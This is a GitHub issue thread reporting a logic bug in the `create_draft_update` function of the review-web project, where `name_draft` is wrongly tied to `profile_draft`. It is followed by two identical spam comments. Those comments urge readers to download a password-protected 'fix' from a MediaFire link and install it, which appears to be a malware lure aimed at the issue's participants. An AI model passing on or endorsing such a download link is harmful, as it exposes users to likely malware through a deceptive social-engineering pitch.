### ISSUE TITLE
Fix `create_draft_update` to handle `name_draft` correctly

### ISSUE THREAD

**Issue by sophie-cluml** [aicers/review-web#284]
In the https://github.com/aicers/review-web/pull/249 PR, `create_draft_update` has been defined.

Currently, there appears to be an error in this function where the value of `name_draft` used when creating a `NodeUpdate` depends on `new.profile_draft`. For example, if `new.profile_draft` is `None`, then `name_draft` is also set to `None`, even though `name_draft` actually has a valid value. 

Also, I think it is necessary to return error when `new.name_draft` is an empty string, regardless of `new.profile_draft`.

We need a bug fix in the code and a relevant test code.

This issue is in line with the comment in the previous PR : https://github.com/aicers/review-web/pull/249#discussion_r1708330095

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
